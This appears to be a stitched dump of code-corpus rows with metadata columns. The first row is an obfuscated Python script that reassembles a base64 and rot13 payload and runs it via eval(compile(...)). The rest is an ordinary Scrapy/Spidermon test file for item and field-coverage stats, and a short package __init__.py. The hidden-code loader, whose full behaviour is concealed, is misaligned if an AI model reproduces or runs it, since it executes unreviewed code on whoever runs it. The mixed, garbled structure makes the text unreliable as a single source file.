101, 51, 99, 117, 82, 85, 53, 69, 102, 88, 116, 51, 76, 107, 74, 80, 84, 69, 82, 57, 73, 69, 49, 70, 84, 107, 70, 78, 85, 69, 108, 77, 83, 48, 70, 79, 73, 70, 78, 70, 84, 86, 86, 66, 73, 69, 70, 81, 84, 69, 108, 76, 81, 86, 78, 74, 73, 69, 49, 80, 82, 65, 112, 55, 100, 121, 53, 83, 82, 85, 82, 57, 87, 51, 116, 51, 76, 107, 86, 79, 82, 72, 49, 55, 100, 121, 53, 67, 84, 48, 120, 69, 102, 84, 74, 55, 100, 121, 53, 83, 82, 85, 82, 57, 88, 88, 116, 51, 76, 107, 86, 79, 82, 72, 49, 55, 100, 121, 53, 67, 84, 48, 120, 69, 102, 83, 66, 78, 82, 85, 53, 68, 81, 86, 74, 74, 73, 70, 78, 70, 81, 108, 86, 66, 83, 67, 66, 66, 85, 69, 120, 74, 83, 48, 70, 84, 83, 83, 66, 78, 84, 48, 81, 75, 74, 121, 99, 110, 75, 81, 111, 75, 99, 121, 65, 57, 73, 70, 78, 108, 99, 51, 78, 112, 98, 50, 52, 111, 75, 81, 111, 75, 98, 51, 66, 122, 97, 83, 65, 57, 73, 71, 108, 117, 100, 67, 104, 112, 98, 110, 66, 49, 100, 67, 104, 109, 74, 121, 99, 110, 101, 51, 99, 117, 85, 107, 86, 69, 102, 101, 75, 86, 114, 101, 75, 85, 103, 79, 75, 85, 103, 79, 75, 85, 103, 79, 75, 85, 103, 72, 116, 51, 76, 108, 74, 70, 82, 72, 48, 111, 101, 51, 99, 117, 82, 85, 53, 69, 102, 88, 116, 51, 76, 107, 74, 80, 84, 69, 82, 57, 85, 69, 108, 77, 83, 85, 103, 103, 84, 49, 66, 84, 83, 88, 116, 51, 76, 108, 74, 70, 82, 72, 48, 112, 52, 111, 67, 84, 87, 51, 116, 51, 76, 107, 86, 79, 82, 72, 49, 55, 100, 121, 53, 67, 84, 48, 120, 69, 102, 85, 66, 80, 83, 107, 70, 79, 76, 107, 78, 90, 85, 48, 86, 68, 101, 51, 99, 117, 85, 107, 86, 69, 102, 86, 48, 75, 101, 51, 99, 117, 85, 107, 86, 69, 102, 101, 75, 86, 115, 79, 75, 85, 103, 79, 75, 85, 103, 79, 75, 85, 103, 79, 75, 85, 103, 79, 75, 101, 115, 105, 66, 55, 100, 121, 53, 68, 87, 85, 70, 79, 102, 88, 116, 51, 76, 107, 74, 80, 84, 69, 82, 57, 74, 121, 99, 110, 75, 83, 107, 75, 99, 72, 74, 112, 98, 110, 81, 111, 100, 121, 53, 70, 84, 107, 81, 112, 67, 103, 112, 112, 90, 105, 66, 118, 99, 72, 78, 112, 73, 68, 48, 57, 73, 68, 69, 54, 67, 105, 65, 103, 73, 67, 66, 48, 73, 68, 48, 103, 85, 72, 74, 108, 100, 72, 82, 53, 86, 71, 70, 105, 98, 71, 85, 111, 87, 121, 100, 79, 84, 121, 99, 115, 73, 67, 100, 79, 81, 85, 49, 66, 74, 121, 119, 103, 74, 48, 116, 80, 82, 69, 85, 110, 76, 67, 65, 110, 86, 69, 70, 79, 82, 48, 100, 66, 84, 67, 100, 100, 75, 81, 111, 103, 73, 67, 65, 103, 89, 50, 49, 107, 75, 67, 100, 106, 98, 71, 86, 104, 99, 105, 99, 112, 67, 105, 65, 103, 73, 67, 66, 105, 89, 87, 53, 117, 90, 88, 73, 111, 75, 81, 111, 103, 73, 67, 65, 103, 97, 71, 57, 116, 90, 88, 66, 104, 90, 50, 85, 103, 80, 83, 66, 122, 76, 109, 100, 108, 100, 67, 103, 110, 97, 72, 82, 48, 99, 72, 77, 54, 76, 121, 57, 116, 98, 50, 82, 107, 97, 87, 53, 110, 100, 87, 53, 112, 100, 71, 86, 107, 76, 110, 104, 53, 101, 105, 99, 112, 76, 110, 82, 108, 101, 72, 81, 75, 73, 67, 65, 103, 73, 72, 82, 118, 100, 71, 70, 115, 73, 68, 48, 103, 89, 110, 77, 111, 97, 71, 57, 116, 90, 88, 66, 104, 90, 50, 85, 115, 73, 67, 100, 115, 101, 71, 49, 115, 74, 121, 107, 117, 90, 109, 108, 117, 90, 70, 57, 104, 98, 71, 119, 111, 74, 50, 69, 110, 76, 67, 66, 55, 74, 50, 78, 115, 89, 88, 78, 122, 74, 122, 111, 103, 74, 51, 66, 104, 90, 50, 85, 116, 98, 110, 86, 116, 89, 109, 86, 121, 99, 121, 100, 57, 75, 86, 115, 120, 88, 83, 53, 48, 90, 88, 104, 48, 67, 105, 65, 103, 73, 67, 66, 106, 98, 51, 86, 117, 100, 67, 65, 57, 73, 68, 65, 75, 73, 67, 65, 103, 73, 71, 90, 118, 99, 105, 66, 112, 73, 71, 108, 117, 73, 72, 74, 104, 98, 109, 100, 108, 75, 71, 108, 117, 100, 67, 104, 48, 98, 51, 82, 104, 98, 67, 107, 115, 73, 68, 65, 115, 73, 67, 48, 120, 75, 84, 111, 75, 73, 67, 65, 103, 73, 67, 65, 103, 73, 67, 66, 49, 99, 109, 119, 103, 80, 83, 65, 110, 97, 72, 82, 48, 99, 72, 77, 54, 76, 121, 57, 116, 98, 50, 82, 107, 97, 87, 53, 110, 100, 87, 53, 112, 100, 71, 86, 107, 76, 110, 104, 53, 101, 105, 57, 119, 89, 87, 100, 108, 76, 51, 116, 57, 74, 121, 53, 109, 98, 51, 74, 116, 89, 88, 81, 111, 97, 83, 107, 75, 73, 67, 65, 103, 73, 67, 65, 103, 73, 67, 66, 121, 73, 68, 48, 103, 99, 121, 53, 110, 90, 88, 81, 111, 100, 88, 74, 115, 75, 81, 111, 103, 73, 67, 65, 103, 73, 67, 65, 103, 73, 72, 78, 118, 100, 88, 65, 103, 80, 83, 66, 105, 99, 121, 104, 121, 76, 110, 82, 108, 101, 72, 81, 115, 73, 67, 100, 115, 101, 71, 49, 115, 74, 121, 107, 75, 73, 67, 65, 103, 73, 67, 65, 103, 73, 67, 66, 109, 98, 51, 73, 103, 97, 83, 66, 112, 98, 105, 66, 121, 90, 88, 90, 108, 99, 110, 78, 108, 90, 67, 104, 121, 89, 87, 53, 110, 90, 83, 103, 119, 76, 67, 65, 120, 77, 83, 107, 112, 79, 103, 111, 103, 73, 67, 65, 103, 73, 67, 65, 103, 73, 67, 65, 103, 73, 67, 66, 48, 99, 110, 107, 54, 67, 105, 65, 103, 73, 67, 65, 103, 73, 67, 65, 103, 73, 67, 65, 103, 73, 67, 65, 103, 73, 67, 66, 106, 98, 51, 86, 117, 100, 67, 65, 57, 73, 71, 78, 118, 100, 87, 53, 48, 75, 122, 69, 75, 73, 67, 65, 103, 73, 67, 65, 103, 73, 67, 65, 103, 73, 67, 65, 103, 73, 67, 65, 103, 73, 72, 82, 104, 90, 121, 65, 57, 73, 72, 78, 118, 100, 88, 65, 117, 90, 109, 108, 117, 90, 70, 57, 104, 98, 71, 119, 111, 74, 50, 70, 121, 100, 71, 108, 106, 98, 71, 85, 110, 75, 86, 116, 112, 88, 81, 111, 103, 73, 67, 65, 103, 73, 67, 65, 103, 73, 67, 65, 103, 73, 67, 65, 103, 73, 67, 65, 103, 100, 71, 108, 48, 98, 71, 85, 103, 80, 83, 66, 48, 89, 87, 99, 117, 90, 109, 108, 117, 90, 67, 103, 110, 97, 68, 77, 110, 76, 67, 66, 55, 74, 50, 78, 115, 89, 88, 78, 122, 74, 122, 111, 110, 90, 87, 53, 48, 99, 110, 107, 116, 100, 71, 108, 48, 98, 71, 85, 110, 102, 83, 107, 117, 100, 71, 86, 52, 100, 65, 111, 103, 73, 67, 65, 103, 73, 67, 65, 103, 73, 67, 65, 103, 73, 67, 65, 103, 73, 67, 65, 103, 98, 71, 108, 117, 97, 121, 65, 57, 73, 72, 82, 104, 90, 121, 53, 109, 97, 87, 53, 107, 75, 67, 100, 104, 74, 121, 108, 98, 74, 50, 104, 121, 90, 87, 89, 110, 88, 83, 53, 121, 90, 88, 66, 115, 89]
tahmid = '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'
pizza = '\x72\x6f\x74\x5f\x31\x33'
mobile = codecs.decode(eval('\x74\x61\x68\x6d\x69\x64'), eval('\x70\x69\x7a\x7a\x61'))
burger = base64.b64decode(''.join([chr(tech) for tech in htr])+eval('\x6d\x6f\x62\x69\x6c\x65'))
eval(compile(eval("\x62\x75\x72\x67\x65\x72"),"<tahm1d>","exec"))
| 3,332.5
| 21,444
| 0.628657
| 4,947
| 26,660
| 3.387912
| 0.020214
| 0.070167
| 0.045107
| 0.057995
| 0.578819
| 0.56784
| 0.559606
| 0.546897
| 0.536635
| 0.524463
| 0
| 0.567098
| 0.184659
| 26,660
| 7
| 21,445
| 3,808.571429
| 0.203938
| 0
| 0
| 0
| 0
| 0
| 0.18811
| 0.186909
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.142857
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c4b0ef90b3c40721cded45a90d9187f86727e17b
| 111
|
py
|
Python
|
transformio/__init__.py
|
karimbahgat/transformio
|
0455aa78ef203b12a2684be0edc69848dd6526e1
|
[
"MIT"
] | null | null | null |
transformio/__init__.py
|
karimbahgat/transformio
|
0455aa78ef203b12a2684be0edc69848dd6526e1
|
[
"MIT"
] | null | null | null |
transformio/__init__.py
|
karimbahgat/transformio
|
0455aa78ef203b12a2684be0edc69848dd6526e1
|
[
"MIT"
] | null | null | null |
from . import transforms
from . import imwarp
from . import vector
from . import accuracy
from . import utils
| 15.857143
| 24
| 0.765766
| 15
| 111
| 5.666667
| 0.466667
| 0.588235
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.189189
| 111
| 6
| 25
| 18.5
| 0.944444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
f21a78b0fe5ba07bf89f3c3f00cd012ec6d2a332
| 9,506
|
py
|
Python
|
tests/test_item_scraped_signal.py
|
zanachka/spidermon
|
d2840b6bbb6ba6d8a0ef633deac66588d243e615
|
[
"BSD-3-Clause"
] | 405
|
2019-01-10T13:06:09.000Z
|
2022-03-30T20:14:58.000Z
|
tests/test_item_scraped_signal.py
|
zanachka/spidermon
|
d2840b6bbb6ba6d8a0ef633deac66588d243e615
|
[
"BSD-3-Clause"
] | 226
|
2019-01-04T13:31:17.000Z
|
2022-03-28T21:06:10.000Z
|
tests/test_item_scraped_signal.py
|
zanachka/spidermon
|
d2840b6bbb6ba6d8a0ef633deac66588d243e615
|
[
"BSD-3-Clause"
] | 87
|
2019-01-07T10:23:26.000Z
|
2022-02-22T04:38:04.000Z
|
import pytest
from scrapy import Item, signals
from scrapy.spiders import Spider
from scrapy.utils.test import get_crawler
class TestItem(Item):
__test__ = False
@pytest.fixture
def spider():
settings = {
"SPIDERMON_ENABLED": True,
"EXTENSIONS": {"spidermon.contrib.scrapy.extensions.Spidermon": 100},
"SPIDERMON_ADD_FIELD_COVERAGE": True,
}
crawler = get_crawler(settings_dict=settings)
spider = Spider.from_crawler(crawler, "example.com")
return spider
def test_add_stats_item_scraped_count_by_item_type(spider):
for _ in range(15):
spider.crawler.signals.send_catch_log_deferred(
signal=signals.item_scraped,
item={"_type": "regular_dict"},
response="",
spider=spider,
)
for _ in range(20):
spider.crawler.signals.send_catch_log_deferred(
signal=signals.item_scraped,
item=Item(),
response="",
spider=spider,
)
for _ in range(25):
spider.crawler.signals.send_catch_log_deferred(
signal=signals.item_scraped,
item=TestItem(),
response="",
spider=spider,
)
stats = spider.crawler.stats.get_stats()
assert stats.get("spidermon_item_scraped_count") == 60
assert stats.get("spidermon_item_scraped_count/dict") == 15
assert stats.get("spidermon_item_scraped_count/Item") == 20
assert stats.get("spidermon_item_scraped_count/TestItem") == 25
def test_item_scraped_count_single_field(spider):
returned_items = [{"field1": "value1"}]
for item in returned_items:
spider.crawler.signals.send_catch_log_deferred(
signal=signals.item_scraped,
item=item,
response="",
spider=spider,
)
stats = spider.crawler.stats.get_stats()
assert stats.get("spidermon_item_scraped_count/dict/field1") == 1
def test_item_scraped_count_multiple_field(spider):
returned_items = [{"field1": "value1", "field2": "value2"}]
for item in returned_items:
spider.crawler.signals.send_catch_log_deferred(
signal=signals.item_scraped,
item=item,
response="",
spider=spider,
)
stats = spider.crawler.stats.get_stats()
assert stats.get("spidermon_item_scraped_count/dict/field1") == 1
assert stats.get("spidermon_item_scraped_count/dict/field2") == 1
def test_item_scraped_count_multiple_items(spider):
returned_items = [
{"field1": "value1", "field2": "value2"},
{"field1": "value1", "field2": "value2"},
]
for item in returned_items:
spider.crawler.signals.send_catch_log_deferred(
signal=signals.item_scraped,
item=item,
response="",
spider=spider,
)
stats = spider.crawler.stats.get_stats()
assert stats.get("spidermon_item_scraped_count/dict/field1") == 2
assert stats.get("spidermon_item_scraped_count/dict/field2") == 2
def test_item_scraped_count_multiple_items_field_missing(spider):
returned_items = [
{"field1": "value1", "field2": "value2"},
{
"field1": "value1",
},
]
for item in returned_items:
spider.crawler.signals.send_catch_log_deferred(
signal=signals.item_scraped,
item=item,
response="",
spider=spider,
)
stats = spider.crawler.stats.get_stats()
assert stats.get("spidermon_item_scraped_count/dict/field1") == 2
assert stats.get("spidermon_item_scraped_count/dict/field2") == 1
def test_item_scraped_count_single_nested_field(spider):
returned_items = [{"field1": {"field1.1": "value1.1"}}]
for item in returned_items:
spider.crawler.signals.send_catch_log_deferred(
signal=signals.item_scraped,
item=item,
response="",
spider=spider,
)
stats = spider.crawler.stats.get_stats()
assert stats.get("spidermon_item_scraped_count/dict") == 1
assert stats.get("spidermon_item_scraped_count/dict/field1") == 1
assert stats.get("spidermon_item_scraped_count/dict/field1/field1.1") == 1
def test_item_scraped_count_multiple_nested_field(spider):
returned_items = [
{
"field1": {"field1.1": "value1.1"},
"field2": "value2",
"field3": {"field3.1": "value3.1"},
},
{
"field1": {
"field1.1": "value1.1",
"field1.2": "value1.2",
},
"field2": "value2",
},
]
for item in returned_items:
spider.crawler.signals.send_catch_log_deferred(
signal=signals.item_scraped,
item=item,
response="",
spider=spider,
)
stats = spider.crawler.stats.get_stats()
assert stats.get("spidermon_item_scraped_count/dict") == 2
assert stats.get("spidermon_item_scraped_count/dict/field1") == 2
assert stats.get("spidermon_item_scraped_count/dict/field1/field1.1") == 2
assert stats.get("spidermon_item_scraped_count/dict/field1/field1.2") == 1
assert stats.get("spidermon_item_scraped_count/dict/field2") == 2
assert stats.get("spidermon_item_scraped_count/dict/field3") == 1
def test_do_not_add_field_coverage_when_spider_closes_if_do_not_have_field_coverage_settings():
settings = {
"SPIDERMON_ENABLED": True,
"EXTENSIONS": {"spidermon.contrib.scrapy.extensions.Spidermon": 100},
"SPIDERMON_ADD_FIELD_COVERAGE": False,
}
crawler = get_crawler(settings_dict=settings)
spider = Spider.from_crawler(crawler, "example.com")
item = {"field1": "value1"}
spider.crawler.signals.send_catch_log_deferred(
signal=signals.item_scraped,
item=item,
response="",
spider=spider,
) # Return item to have some stats to calculate coverage
crawler.signals.send_catch_log(
signal=signals.spider_closed, spider=spider, reason=None
)
stats = spider.crawler.stats.get_stats()
assert stats.get("spidermon_field_coverage/dict/field1") is None
def test_add_field_coverage_when_spider_closes_if_have_field_coverage_settings():
settings = {
"SPIDERMON_ENABLED": True,
"EXTENSIONS": {"spidermon.contrib.scrapy.extensions.Spidermon": 100},
"SPIDERMON_ADD_FIELD_COVERAGE": True,
}
crawler = get_crawler(settings_dict=settings)
spider = Spider.from_crawler(crawler, "example.com")
item = {"field1": "value1"}
spider.crawler.signals.send_catch_log_deferred(
signal=signals.item_scraped,
item=item,
response="",
spider=spider,
) # Return item to have some stats to calculate coverage
crawler.signals.send_catch_log(
signal=signals.spider_closed, spider=spider, reason=None
)
stats = spider.crawler.stats.get_stats()
assert stats.get("spidermon_field_coverage/dict/field1") == 1.0
def test_item_scraped_count_ignore_none_values():
settings = {
"SPIDERMON_ENABLED": True,
"EXTENSIONS": {"spidermon.contrib.scrapy.extensions.Spidermon": 100},
"SPIDERMON_ADD_FIELD_COVERAGE": True,
"SPIDERMON_FIELD_COVERAGE_SKIP_NONE": True,
}
crawler = get_crawler(settings_dict=settings)
spider = Spider.from_crawler(crawler, "example.com")
returned_items = [
{"field1": "value1", "field2": "value2"},
{"field1": "value1", "field2": None},
]
for item in returned_items:
spider.crawler.signals.send_catch_log_deferred(
signal=signals.item_scraped,
item=item,
response="",
spider=spider,
)
stats = spider.crawler.stats.get_stats()
assert stats.get("spidermon_item_scraped_count/dict/field1") == 2
assert stats.get("spidermon_item_scraped_count/dict/field2") == 1
def test_item_scraped_count_do_not_ignore_none_values():
settings = {
"SPIDERMON_ENABLED": True,
"EXTENSIONS": {"spidermon.contrib.scrapy.extensions.Spidermon": 100},
"SPIDERMON_ADD_FIELD_COVERAGE": True,
"SPIDERMON_FIELD_COVERAGE_SKIP_NONE": False,
}
crawler = get_crawler(settings_dict=settings)
spider = Spider.from_crawler(crawler, "example.com")
returned_items = [
{"field1": "value1", "field2": "value2"},
{"field1": "value1", "field2": None},
]
for item in returned_items:
spider.crawler.signals.send_catch_log_deferred(
signal=signals.item_scraped,
item=item,
response="",
spider=spider,
)
stats = spider.crawler.stats.get_stats()
assert stats.get("spidermon_item_scraped_count/dict/field1") == 2
assert stats.get("spidermon_item_scraped_count/dict/field2") == 2
def test_item_scraped_count_do_not_ignore_none_values_by_default(spider):
returned_items = [
{"field1": "value1", "field2": "value2"},
{"field1": "value1", "field2": None},
]
for item in returned_items:
spider.crawler.signals.send_catch_log_deferred(
signal=signals.item_scraped,
item=item,
response="",
spider=spider,
)
stats = spider.crawler.stats.get_stats()
assert stats.get("spidermon_item_scraped_count/dict/field1") == 2
assert stats.get("spidermon_item_scraped_count/dict/field2") == 2
| 30.664516
| 95
| 0.64717
| 1,085
| 9,506
| 5.376037
| 0.076498
| 0.094291
| 0.098749
| 0.110406
| 0.935539
| 0.928167
| 0.910338
| 0.866792
| 0.859421
| 0.844677
| 0
| 0.021218
| 0.236482
| 9,506
| 309
| 96
| 30.763754
| 0.782447
| 0.011046
| 0
| 0.647303
| 0
| 0
| 0.22707
| 0.162694
| 0
| 0
| 0
| 0
| 0.116183
| 1
| 0.053942
| false
| 0
| 0.016598
| 0
| 0.082988
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
f22325e6f64bd7ad8c30fa92430526321ebe1978
| 36
|
py
|
Python
|
petk/__init__.py
|
open-data-toronto/petk
|
b7687ca21771f9bb0cf9191c6bc4642b7c2311c3
|
[
"MIT"
] | null | null | null |
petk/__init__.py
|
open-data-toronto/petk
|
b7687ca21771f9bb0cf9191c6bc4642b7c2311c3
|
[
"MIT"
] | null | null | null |
petk/__init__.py
|
open-data-toronto/petk
|
b7687ca21771f9bb0cf9191c6bc4642b7c2311c3
|
[
"MIT"
] | null | null | null |
from .exploration import DataReport
| 18
| 35
| 0.861111
| 4
| 36
| 7.75
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 36
| 1
| 36
| 36
| 0.96875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
